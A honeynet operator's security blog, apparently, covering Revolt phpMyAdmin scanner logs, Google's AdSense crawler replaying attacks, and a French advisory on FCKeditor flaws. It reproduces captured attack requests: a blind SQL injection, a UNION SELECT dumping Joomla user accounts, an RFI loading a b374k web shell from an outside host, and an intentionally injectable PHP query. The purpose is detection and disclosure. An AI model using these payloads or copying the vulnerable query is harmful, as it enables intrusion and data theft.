SUC004 : phpMyAdmin User-Agent Revolt Scanner

  • Use Case Reference : SUC004
  • Use Case Title : phpMyAdmin User-Agent Revolt Scanner
  • Use Case Detection : HTTP Logs / IDS
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : Revolt Scanner
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random port, but static source port when scan is initiated
  • Destination Port(s) : 80/TCP, 443/TCP
Possible(s) correlation(s) :
  • phpMyAdmin scanner

Source(s) :

Surely during your daily HTTP log check, you have detect theses kind of patterns.

...
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/mysql/sqlmanager/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/mysql/mysqlmanager/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmyadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpMyadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpMyAdmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmyAdmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmyadmin2/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/2phpmyadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmy/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phppma/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/myadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/MyAdmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/program/ HTTP/1.1" 301 - "-" "revolt"
...

Theses patterns are related to Revolt Scanner, an Web scanner specialized in phpMyAdmin installation discovery. When the scanner is started the source port will stay static during the complete web directory discovery brute forcing. Also, this scanner is only targeting the IN A IP address of the domain he is asking.

Theses scans are detected by Emerging Threats Snort rules, more precisely the 2009288WEB_SERVER Attack Tool Revolt Scanner“.

You can find here, the typical list of directories how are scanned by revolt.

Here under you can find the latest statistics for Revolt Agent activities.

1 Month SIG 2009288 events activities
1 Month SIG 2009288 events activities
One year SIG 2009288 events activities
One year SIG 2009288 events activities
1 Month TOP 10 source IPs for SIG 2009288
1 Month TOP 10 source IPs for SIG 2009288
TOP 20 source countries for SIG 2009288
TOP 20 source countries for SIG 2009288

Google Mediapartners crawlers replaying web attacks

In the use case analysis SUC001, we have discovered that Google Mediapartners crawlers seems to replay web attacks under certain conditions :

  • Your website need to be a member of the AdSense network.
  • Your robots.txt file should not exclude the indexing of the “Mediapartners-Google”.
  • Your website targeted web page should contain a AdSense banner.
  • The “Mediapartners-Google” crawler should come frequently visit your website, better each time per web page display.

I have create a fake MySQL database named “injection“, you can find here under the fake content of this database.

CREATE TABLE IF NOT EXISTS `injection` (
  `id` int(11) NOT NULL auto_increment,
  `password` varchar(255) NOT NULL,
  PRIMARY KEY  (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=3 ;

INSERT INTO `injection` (`id`, `password`) VALUES
(1, 'testtest'),
(2, 'testtesttest');

I grant the MySQL user “injection” only to SELECT on the “injection” table and this locale.

After the creation of all SQL requirements, we need to create a PHP test page with a “id” parameter how is vulnerable to an SQL Injection attack, for example “test2.php?id=2“.

$sql = "SELECT password FROM injection WHERE id=" . $_REQUEST['id'];

We also insert into this web page some good keywords (just copy and past your favorite web article), and the required AdSense banner. Now every thing is configured, we can play to see if the Google Mediapartners crawlers will replay the SQL Injection attack.

The SQL Injection how will be played is the following :

SELECT password FROM injection WHERE id=2 AND ORD(MID((SELECT 4 FROM information_schema.TABLES LIMIT 0, 1), 70, 1)) > 51 AND 4454=4454

The web query result into the apache log file is returning this entry :

80.90.60.93 - - [20/Apr/2010:22:48:45 +0200] "GET //test2.php?id=2%20AND%20ORD%28MID%28%28SELECT%204%20FROM%20information_schema.TABLES%20LIMIT%200%2C%201%29%2C%2070%2C%201%29%29%20%3E%2051%20AND%204454=4454 HTTP/1.1" 200 1280 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; fr-fr) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"

The MySQL log file is returning this entry :

100420 22:48:45
419 Connect     [email protected] on
1419 Init DB     injection
1419 Query       SELECT password FROM injection WHERE id=2 AND ORD(MID((SELECT 4 FROM information_schema.TABLES LIMIT 0, 1), 70, 1)) > 51 AND 4454=4454

This HTTP query is followed a few seconds later by the Google Mediapartners crawler.

66.249.71.1 - - [20/Apr/2010:22:48:48 +0200] "GET //test2.php?id=2%20AND%20ORD(MID((SELECT%204%20FROM%20information_schema.TABLES%20LIMIT%200%2C%201)%2C%2070%2C%201))%20%3E%2051%20AND%204454=4454 HTTP/1.1" 200 1280 "-" "Mediapartners-Google"

And with no suprise we can see into the MySQL log file that the crawler is replaying the SQL Injection.

100420 22:48:48
1432 Connect     [email protected] on
1432 Init DB     injection
1432 Query       SELECT password FROM injection WHERE id=2 AND ORD(MID((SELECT 4 FROM information_schema.TABLES LIMIT 0, 1), 70, 1)) > 51 AND 4454=4454

So, in conclusion, if you website is a member of the Google AdSense network, displaying some AdSense banners, vulnerable and targeted by an SQL Injection, you will not be only owned by the bad guys, but also by Google 🙂

SUC001 : Google Mediapartners crawlers owned ? SQL injection + RFI detected

  • Use Case Reference : SUC001
  • Use Case Title : Google Mediapartners crawlers owned ? SQL injection + RFI detected
  • Use Case Detection : HTTP Logs / Database Logs / IDS
  • Targeted Attack : N/A
  • Identified tool(s) : Google Mediapartners crawler
  • Source IP(s) : Google – 66.249.64.0/19
  • Source Countries : N/A
  • Source Port(s) : Random
  • Destination Port(s) : 80 TCP

Today, same as every day, I have verify ZATAZ HoneyNet activities for the last 24 hours, and detect a SQL injection attempts on one of our servers. Actually looking a way to better attract the SQL Injection activities, I have look if one of my tactics has got some results. Analyzing the datas of the SQL injections attacks I was surprised about the result.

The source IP from this SQL injection attempt is Google, and more precisely one of the Google Mediapartners crawlers (66.249.65.12 – crawl-66-249-65-12.googlebot.com), confirmed by the whois on the IP address.

Here under you can find the activity of this Google Mediapartner crawler on our HoneyNet.

Current week google crawler 66.249.65.12 activities

The count of the 5 fingerprints for today are due to multiple pattern detection from the HoneyNet.

current month google crawler 66.249.65.12 activities

For the current month, this is not the only time, that the Google crawler was detected as potential source of an attack.

Most of time, the crawler reporting a lot of IDS false positives. We have to go deeper in the investigation to act theses alerts as false negatives or not.

google crawler 66.249.65.12 event details

The 133304 and 131291 CIDs are really false positives during indexing activities.

GET /news/8176/login.html HTTP/1.1
Host: xxx.xxx.xxx
Connection: Keep-alive
Accept: */*
From: googlebot(at)googlebot.com
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept-Encoding: gzip,deflate
If-Modified-Since: Sun, 11 Apr 2010 07:58:58 GMT
All the 2010-04-19 18:24:45 GMT + 2 CIDs are only one fingerprint, how are really interesting to investigate.
2010-04-19 18:24:45
GET /alerte-securite//index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,email,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users-- HTTP/1.1
Host: www.zataz.com
Connection: Keep-alive
Accept: */*
User-Agent: Mediapartners-Google
Accept-Encoding: gzip,deflate
As you can see there is an real SQL injection attempt. You can also see that the User-Agent differs from the false positives CIDs (Mediapartners-Google).
The CID 129140 is not related to an SQL injection attempt, but an RFI (Remote File Inclusion) attempt and the User-Agent is also Mediapartners-Google.
2010-04-09 07:06:59
GET /alerte-securite/20058/MassMirror-Uploader-GLOBALS%5BMM_ROOT_DIRECTORY%5D-upload_progress.php?GLOBALS%5BMM_ROOT_DIRECTORY%5D=http://revtan.site40.net/b374k.jpg HTTP/1.1
Host: www.zataz.com
Connection: Keep-alive
Accept: */*
User-Agent: Mediapartners-Google
Accept-Encoding: gzip,deflate
Mediapartners Google User Agent is a dedicated crawler for Google AdSense, advertisements network. This robot analyze the page that display AdSense ads in order to target the ads to the page content. Normally site how do not show AdSense ads do not get visits of this crawler. The Google Mediapartners bot is using the same cache as the standard indexing bot (Googlebot).
If you only focus on theses CIDs you will not have a complete overview about the generation of theses alerts. You need to investigate the timeframe (+- 1 minutes) around this alerts.
A few seconds “2010-04-19 18:24:40” before the Google Mediapartners crawler has generate an alert, another alert was generated by “78.173.10.213” IP address, how has the exactly same URL pattern.
2010-04-19 18:24:40

Source Address : 78.173.10.213

GET /alerte-securite//index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,email,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users-- HTTP/1.1
Host: www.zataz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.2) Gecko/20100115 Firefox/3.6 ()
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-9,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=ao791k1rtkmhqdhko9palil7r7; zatazsession_id=e356c332d8eba6d3bba2023c13cecc8a; __qca=P0-1134447578-1271694138756; __utma=163730740.1460337807.1271694138.1271694138.1271694138.1; __utmb=163730740.1.10.1271694138; __utmc=163730740; __utmz=163730740.1271694144.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=inurl%3A%27%27com_properties%27%27%20.de

We can see that after “78.173.10.213” IP address has access a web page containing an AdSense ads, the Mediapartners Google bot has directly re index the same page, and replaying exactly the same query containing the SQL injection attempt.

It is clearly a false positive, Google is not targeting your website with SQL Injection, or RFI, attacks attempts. The bot is only replaying what previous attackers had attempt.

This point is interesting, cause if for example the SQL injection was successful, normally the content of your database will be displayed into the web page. A few seconds later, the Google Mediapartners bot will replay the same SQL injection query, and will he index the content of the database displayed into the web page ? After some deeper investigations it seems that yes.

Vulnérabilités dans Fckeditor <= 2.6.4

Le SANS ISC (SANS Internet Storm Center) a lancé une alerte sur l’éditeur HTML FCKeditor après que de nombreuses attaques 0day aient été détectées. Ces attaques vise particulièrement les sites web utilisant Adobe ColdFusion 8 (FCKeditor est module livré avec ce logiciel).

L’éditeur Adobe a aussi émit une alerte “potentielle” (sic) sur la vulnérabilité de son produit, et une mise à jour sera livrée, peut-être, semaine prochaine …. Une semaine complète, au minimum, durant laquelle de nombreux sites web utilisant ColdFusion 8 pourront servir de relais à des attaques. De plus, Adobe a eu l’idée ingénieuse d’activer par défaut le module FCKeditor ColdFusion depuis la version 8.0.1 de son logiciel.

Mais ce qui est le plus inquiétant c’est que toutes les versions antérieures ou égales à FCKeditor 2.6.4 sont vulnérables, et cela peut importe si on utilise ColdFusion ou non. L’exploitation de la vulnérabilité est possible dès qu’un connecteur est déclaré comme actif dans le fichier de configuration “config.php”. Les entrées envoyées au paramètre “CurrentFolder“, de différents modules de connexion (voir liste ci-dessous), ne sont pas traitées correctement permettant ainsi d’afficher le contenu de répertoire arbitraires ou de télécharger des fichiers sur le serveur. D’autres vulnérabilités, du type Cross Site Scripting (XSS) sont aussi présentes et celles-ci fonctionne aussi peut importe le langage supporté.

L’éditeur a fournis une mise à jour de sécurité 2.6.4.1 corrigeant les vulnérabilités. Si la version de FCKeditor n’est pas à jour, et qu’un seul des connecteurs soit actif dans le fichier de configuration, l’on peut dire bye bye a son serveur.

L’on peut même se demander, si finalement l’éditeur de FCKeditor n’a pas mis trop de temps à réagir –> regardez cela http://www.milw0rm.org/exploits/8060 –> oula c’est sorti le 2009-02-16, hum hum un tas de foin pour rien ???

Les fichiers mis à jour entre la version 2.6.4 et la version 2.6.4.1, et qui traite le XSS, sont :

_samples/asp/sample02.asp, la variable "Lang" a été protégée contre les attaques du type XSS
_samples/asp/sample03.asp, la variable "Toolbar" a été protégée contre les attaques du type XSS
_samples/asp/sample04.asp, la variable "Skin" a été protégée contre les attaques du type XSS

 

_samples/cfm/sample02.cfm, la variable "Lang" a été protégée contre les attaques du type XSS
_samples/cfm/sample02_mx.cfm, la variable "Lang" a été protégée contre les attaques du type XSS
_samples/cfm/sample03.cfm, la variable "Toolbar" a été protégée contre les attaques du type XSS
_samples/cfm/sample03_mx.cfm, la variable "Toolbar" a été protégée contre les attaques du type XSS
_samples/cfm/sample04.cfm, la variable "Skin" a été protégée contre les attaques du type XSS
_samples/cfm/sample04_mx.cfm, la variable "Skin" a été protégée contre les attaques du type XSS
Le XSS permet de s'exécuter lors du traitement des variables retournées par le script _samples/cfm/sampleposteddata.cfm

_samples/lasso/sample02.lasso, la variable "Lang" a été protégée contre les attaques du type XSS
_samples/lasso/sample03.lasso, la variable "Toolbar" a été protégée contre les attaques du type XSS
_samples/lasso/sample04.lasso, la variable "Skin" a été protégée contre les attaques du type XSS
Le XSS permet de s'exécuter lors du traitement des variables retournées par le script /_samples/lasso/sampleposteddata.lasso

_samples/perl/sample02.cgi, la variable “Lang” a été protégée contre les attaques du type XSS
_samples/perl/sample03.cgi, la variable “Toolbar” a été protégée contre les attaques du type XSS
_samples/perl/sample04.cgi, la variable “Skin” a été protégée contre les attaques du type XSS
Le XSS permet de s’exécuter lors du traitement des variables retournées par le script _samples/perl/sampleposteddata.cgi

_samples/php/sample02.php, la variable “Lang” a été protégée contre les attaques du type XSS
_samples/php/sample03.php, la variable “Toolbar” a été protégée contre les attaques du type XSS
_samples/php/sample04.php, la variable “Skin” a été protégée contre les attaques du type XSS
Le XSS permet de s’exécuter lors du traitement des variables retournées par le script _samples/php/sampleposteddata.php

 

Le XSS permet de s’exécuter lors du traitement des variables retournées par le script sampleposteddata.py

Les fichiers mis à jour entre la version 2.6.4 et la version 2.6.4.1, et qui traite l’upload de fichier arbitraire, sont :

editor/filemanager/connectors/asp/io.asp
editor/filemanager/connectors/asp/upload.asp

editor/filemanager/connectors/cfm/cf_io.cfm
editor/filemanager/connectors/cfm/cf_upload.cfm

editor/filemanager/connectors/lasso/upload.lasso

editor/filemanager/connectors/perl/connector.cgi
editor/filemanager/connectors/perl/io.pl
editor/filemanager/connectors/perl/upload.cgi

editor/filemanager/connectors/php/commands.php
editor/filemanager/connectors/php/io.php
editor/filemanager/connectors/php/upload.php

 

editor/filemanager/connectors/py/upload.py